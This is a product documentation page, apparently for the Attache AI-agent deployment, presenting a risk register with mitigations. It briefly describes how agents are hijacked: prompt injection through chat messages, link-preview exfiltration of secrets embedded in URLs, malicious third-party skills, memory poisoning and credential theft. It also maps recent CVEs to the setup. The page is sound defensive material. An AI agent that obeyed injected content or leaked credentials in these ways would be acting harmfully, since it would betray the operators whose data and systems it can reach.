Skip to main content

Risk Register

A structured look at what can go wrong, how likely it is in an Attache deployment, and what Attache does about it by default.

Agent-level risks

RiskSeverityHow it happensWhat Attache does about itWhat you still need to do
LLM data exposureMediumCode, messages, and file contents get sent to Anthropic/OpenAI as part of promptsUses Anthropic's enterprise API with zero-retention policy; data isn't used for trainingVerify your provider's data handling terms. If clients or stakeholders care, document it explicitly. See LLM Provider Data Handling.
Persistent autonomous accessHighThe agent has shell, file system, credential, and messaging access around the clockRuns on a dedicated Mac mini under an isolated OS user, not your admin account. Exec defaults to allowlist mode.Scope your 1Password vaults. Review what tools each agent actually needs. Use the secrets proxy daemon for credential access.
Prompt injection via messagingHighMalicious content in Slack/Discord messages tricks the agent into unintended actionsExternal web content is wrapped with injection markers. Channel policies default to allowlist mode with requireMention.Run separate personal and team agents (Multiplayer). Monitor logs for injection signatures.
Link preview exfiltrationMediumAgent generates a URL with sensitive data embedded in it; the messaging platform renders a preview, sending the data to an attacker's server via GET requestNo built-in defense. This is a platform-level issue — depends on whether Slack/Discord render previews for the generated URL.Be aware this attack exists. On platforms that allow it, consider disabling link previews in agent channels.
Supply chain compromiseHighMalicious ClawHub skills exfiltrate data or install malware (800+ malicious packages identified in the ClawHavoc campaign, Koi Security, 2026)Policy of never installing third-party skills directlyEnforce this strictly. Inspect and rewrite any code you pull from external sources.
Memory and context poisoningMediumAttacker injects content into agent memory files, influencing future sessions (OWASP ASI06)Workspace isolation between personal and team agents. Memory files segmented by agent.Audit memory files periodically. Watch for instructions that seem to have appeared from nowhere.
Credential theftHighCompromised agent reads API keys from config, keychain, or 1Password and transmits them to an external server1Password with scoped service account tokens. Loopback gateway binding. Secrets proxy daemon with per-secret allowlist and DM approval.Use scoped vaults. Configure network egress controls.
Cross-session contaminationLowContext from one agent session leaks into anotherOpenClaw's session architecture provides isolationUse separate agent configs for different trust levels. Don't share workspaces between agents handling different clients.

Infrastructure-level risks

RiskSeverityHow it happensWhat Attache does about itWhat you still need to do
Gateway exposed to the internetCriticalGateway bound to 0.0.0.0 or forwarded through a public proxyAttache binds to loopback by default. Tailscale for remote access.Verify bind: "loopback" in your config. Test from another machine on your LAN — the connection should fail.
Gateway token leakedHighPairing code shared insecurely; code contained the long-lived gateway token in versions before v2026.3.12Token auth mode (not trusted-proxy). Patched in v2026.3.12.Upgrade to 2026.3.12+. Rotate your gateway token. Be careful with how you share pairing codes.
SSH brute forceLowPassword-based SSH authentication allows automated login attemptsAttache's setup playbook configures key-only SSH.Verify PasswordAuthentication no in your sshd_config.
Stale softwareMediumKnown CVEs remain unpatchedAnsible-managed config enables reproducible updates.Patch within 48 hours for high/critical. Run openclaw security audit weekly.
Unrestricted network egressMediumCompromised agent exfiltrates data to arbitrary external serversLoopback binding limits inbound access.Configure DNS-level blocking and firewall rules for outbound traffic.

How recent CVEs and advisories map to Attache deployments

Not every CVE matters equally. Here's how the recent disclosures apply to a standard Attache setup:

IssueSeverityRelevant to Attache?Reasoning
CVE-2026-25253 — Auth token theft via crafted URLHigh (8.8)Yes, mitigatedAttache ships versions past v2026.1.29. Was relevant to any deployment running a version before that.
CVE-2026-22175 — Exec allowlist bypass via busybox/toyboxHigh (7.1)Only if on allowlist mode with a vulnerable versionUpgrade to v2026.2.23+. Deployments using exec.security: "full" aren't affected (there's no allowlist to bypass).
Advisory: Origin bypass — WebSocket hijacking via trusted-proxy modeCriticalNot applicableAttache uses auth.mode: "token". The attack requires trusted-proxy.
Advisory: Exec glob bypass — Wildcard ? crosses directory boundariesModerateOnly with glob-based allowlist patternsUpgrade to v2026.3.11+. Use explicit paths in allowlists, not wildcards.
Advisory: Credential in pairing — Setup codes contain long-lived tokensModerateYesAffected versions before v2026.3.12. Upgrade and rotate your gateway token if you've ever shared a setup code.
Advisory: DM-to-group auth bypass — DM-paired senders treated as authorized in groupsLowNoThis is specific to LINE. Attache uses Discord and Slack.
Context matters

These severity ratings assume a standard Attache deployment: loopback binding, Tailscale, token auth, dedicated hardware. If your setup deviates from those defaults, your exposure may be different.

Risks you have to accept

Some things about AI agent deployments can't be fully mitigated with configuration. Documenting them honestly is better than pretending they don't exist.

Your data goes to LLM providers. Even with zero-retention agreements, your code and conversations travel to Anthropic or OpenAI's servers for inference. This is the cost of using hosted models. If that's unacceptable for a particular project, consider routing through AWS Bedrock or Google Vertex AI where the model provider never sees your prompts — or accept that the agent can't work on that project. Self-hosted or on-prem inference is another option if your scale justifies it.

No current defense fully eliminates prompt injection. Defense in depth — allowlists, isolation, the secrets proxy daemon, network egress controls, monitoring — reduces the likelihood and limits the blast radius. But a sufficiently clever injection against a sufficiently capable agent can still succeed. The industry hasn't cracked this, including Anthropic, OpenAI, and Google. Attache's approach is to minimize what a successful injection can reach, not to promise it can't happen.

Useful agents need real access. An agent that can't read files, run commands, or call APIs has limited utility. Any capability you give the agent is a capability an attacker inherits if they compromise it. You're always trading security for utility. Attache's four-tier model and secrets proxy make that tradeoff conscious and granular rather than all-or-nothing.

These aren't reasons to avoid agent deployments. They're reasons to deploy with appropriate controls and honest expectations.